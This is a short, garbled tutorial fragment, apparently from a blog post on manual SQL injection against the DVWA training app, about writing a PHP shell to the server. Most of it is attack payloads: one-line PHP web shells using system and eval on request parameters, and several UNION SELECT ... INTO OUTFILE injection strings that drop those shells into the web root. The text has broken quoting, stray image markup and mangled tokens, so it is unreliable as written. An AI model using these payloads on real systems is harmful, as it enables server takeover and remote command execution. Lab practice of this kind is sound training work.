Idea: Upload a "backdoor", through the control back door to get the shell, such as a word Trojan. Like what:
<?system ($_request[' cmd ');? >//Submit via request, execute Shell<[email protected] ($_post[' Chopper ');? >
PHP A word trojan, directly on the chopper
This constructs the following statement:
1 ' and 1=2 Union select ' <? ', System ($_request[' cmd ');? > "
into outfile "d:\\xampp\\htdocs\\dvwa\\yy.php" #
1 ' and 1=2 Union select 1, ' <?system ($_request[' cmd ');? > "Into OutFile" f:\\xampp\\htdocs\\dvwa\\zzz.php "--
650) this.width=650; "Src=" Http://s4.51cto.com/wyfs02/M02/86/CF/wKiom1fLzO6w2AbHAAIURuE1dG4326.jpg-wh_500x0-wm_3 -wmp_4-s_1679569698.jpg "title=" cmd.jpg "alt=" Wkiom1flzo6w2abhaaiurue1dg4326.jpg-wh_50 "/>
1 ' and 1=2 Union select ' <? ', ' System ($_request[' cmd ']);? > "Into OutFile" d:\\
Xampp\\htdocs\\dvwa\\zzz.php "
<?php eval ($_post[' 888 ']);? >
1 ' and 1=2 Union select 1, "<?php eval ($_post[' 888");? > "Into OutFile" d:\\xampp\\htdocs\\dvwa\\yyy.php "#
SQL inject exploit manual process details: Get shell